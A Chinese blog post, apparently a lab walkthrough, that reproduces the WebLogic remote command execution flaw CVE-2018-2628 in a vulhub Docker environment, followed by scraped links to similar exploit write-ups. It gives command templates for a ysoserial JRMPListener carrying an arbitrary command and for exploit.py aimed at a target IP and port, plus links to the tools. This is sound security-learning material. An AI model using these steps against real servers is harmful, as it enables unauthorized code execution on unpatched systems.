Weblogic命令执行漏洞(CVE-2018-2628)复现
一、漏洞环境搭建
   CVE-2018-2628影响的软件版本为:
   Weblogic 10.3.6.0
   Weblogic 12.1.3.0
   Weblogic 12.2.1.2
   Weblogic 12.2.1.3
需要准备的工具如下:
1.docker+vulhub漏洞库
2.ysoserial-cve-2018-2628,下载链接https://github.com/tdy218/ysoserial-cve-2018-2628/releases
3.expolit.py脚本,下载链接https://www.exploit-db.com/exploits/44553
这里我使用的Ubuntu18.04虚拟机,直接进入环境
root@admin666-virtual-machine:~/vulhub-master/weblogic/CVE-2018-2628#
执行命令
root@admin666-virtual-machine:~/vulhub-master/weblogic/CVE-2018-2628#docker-compose up -d
等到出现done即表示搭建完成,可以访问http://your-ip:7001,出现如下页面即代表搭建成功!

二、攻击阶段
  攻击机可以是Linux系统,也可以是Windows系统,在这里使用Windows10本机作为攻击机,注意:Win10上需要有java环境和python环境(最好是python2,python3可能会运行报错)
1.在攻击机上使用ysoserial-cve-2018-2628工具,使用格式如下:
java -cp "ysoserial-0.1-cve-2018-2628-all.jar" ysoserial.exploit.JRMPListener [攻击机监听端口] jdk版本编号 "要执行的命令"
注:jdk版本只要大于1.7,直接填Jdk7u21就可以了
执行完后是这个样子,注意不是所有的命令都可以执行


2.在攻击机上使用exploit.py,使用格式如下:
python2 exploit.py 靶机IP 端口(默认7001) ysoserial-0.1-cve-2018-2628-all.jar的位置 攻击机IP 攻击机监听端口 JRMPClient
这里为了省事,把这些工具都放在一个目录下,执行完后是这个样子

出现这种情况代表已经成功!如果没成功可能有2个原因:
(1)python版本不对,脚本执行报错,建议使用python2
(2)主机防火墙开着,靶机可能访问不了主机监听的端口,可以试着直接关掉防火墙
三、验证是否攻击成功
进入虚拟机环境,输入docker-compose exec weblogic bash,查看/tmp下是否生成了test文件


Weblogic命令执行漏洞(CVE-2018-2628)复现的更多相关文章
- Supervisord远程命令执行漏洞(CVE-2017-11610)复现
		Supervisord远程命令执行漏洞(CVE-2017-11610)复现 文章首发在安全客 https://www.anquanke.com/post/id/225451 写在前面 因为工作中遇到了 ... 
- Weblogic wls9_async_response 反序列化远程命令执行漏洞(CVE-2019-2725)复现
		一. 漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8. CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为 ... 
- ThinkPHP 5.x远程命令执行漏洞复现
		ThinkPHP 5.x远程命令执行漏洞复现 一.漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.th ... 
- weblogic发序列化命令执行漏洞工具分享
		weblogic发序列化命令执行漏洞工具分享(链接: https://pan.baidu.com/s/1qE5MFJ32672l-MMl-QL-wQ 密码: d85j) JBOSS_EXP 工具分享( ... 
- D-Link service.cgi远程命令执行漏洞复现
		1.1 概述 友讯集团(D-Link),成立于1986年,1994年10月于台湾证券交易所挂牌上市,为台湾第一家上市的网络公司,以自创D-Link品牌行销全球,产品遍及100多个国家. 1月17日,C ... 
- Apache SSI 远程命令执行漏洞复现
		Apache SSI 远程命令执行漏洞复现 一.漏洞描述 当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令. 使 ... 
- thinkphp5.x命令执行漏洞复现及环境搭建
		楼主Linux环境是Centos7,LAMP怎么搭不用我废话吧,别看错了 一.thinkphp5.X系列 1.安装composer yum -y install composer 安装php拓展 yu ... 
- WordPress <= 4.6 命令执行漏洞(PHPMailer)复现分析
		漏洞信息 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站.也可以把 WordPress 当作一个内容管理系统(C ... 
- Struct2远程命令执行漏洞(S2-053)复现学习
		1.S2-053(CVE-2017-12611) RCE出自一道题目 http://www.whalwl.cn:8027/hello.action 漏洞产生原因:Struts2在使用Freemarke ... 
随机推荐
- 程序演示:C语言第一个简单实例
			在信息化.智能化的世界里,可能很早很早 我们就听过许多IT类的名词,C语言也在其中,我们侃侃而谈,到底C程序是什么样子?让我们先看简单的一个例子: 1 2 3 4 5 6 7 8 9 #include ... 
- 基于HAL库的STM32的DSP库详解(附FFT应用)
			1 . 建立工程,生成代码时选择包含所有库. 2. 打开 option for target 选择 Target 标签,在code generatio中,将floating point hardw ... 
- NTML
			NTLM: 1.客户端向服务器发送一个请求,请求中包含明文的登陆用户名.在服务器中已经存储了登陆用户名和对应的密码hash 2.服务器接收到请求后,NTLMv2协议下 ... 
- rest-framework:认证组件
			一 认证简介: 只有认证通过的用户才能访问指定的url地址,比如:查询课程信息,需要登录之后才能查看,没有登录,就不能查看,这时候需要用到认证组件 二 局部使用 models.py class Use ... 
- DjangoForm表单组件
			Form组件的介绍: 我们之前在HTML页面中利用form表单向后端提交数据时,都会写一些获取用户输入的标签并且用form标签把它们包起来. 与此同时我们在好多场景下都需要对用户的输入做校验,比如校验 ... 
- mongo聚合操作
			1 mongodb的聚合是什么 聚合(aggregate)是基于数据处理的聚合管道,每个文档通过一个由多个阶段(stage)组成的管道,可以对每个阶段的管道进行分组.过滤等功能,然后经过一系列的处理, ... 
- 第2.3节 Python运算符大全
			一. Python的算术运算 Python的算术运算符与C语言类似,略有不同.包括加(+).减(-).乘(*).除(/).取余(%).按位或(|).按位与(&).按位求补(~).左移位(< ... 
- 第7.21节 Python抽象类—register注册虚拟子类
			上两节介绍了Python抽象类的真实子类的定义和使用,本节介绍另一种抽象类的实现方法:虚拟子类方法. 一. 相关概念 虚拟子类是将其他的不是从抽象基类派生的类"注册"到抽象基 ... 
- PyQt(Python+Qt)学习随笔:Qt Designer中部件的快捷菜单策略(contextMenuPolicy)取值及含义
			在Qt Designer中可以设置部件的快捷菜单策略,快捷菜单通过在部件上点击鼠标右键触发. 快捷菜单策略通过枚举类型Qt.ContextMenuPolicy来定义,对应枚举类型取值及含义如下: 通过 ... 
- hihocoder 1489(微软2017, 数学,模拟)
			题目链接:http://hihocoder.com/problemset/problem/1489?sid=1587434 时间限制:10000ms 单点时限:1000ms 内存限制:256MB 描述 ... 
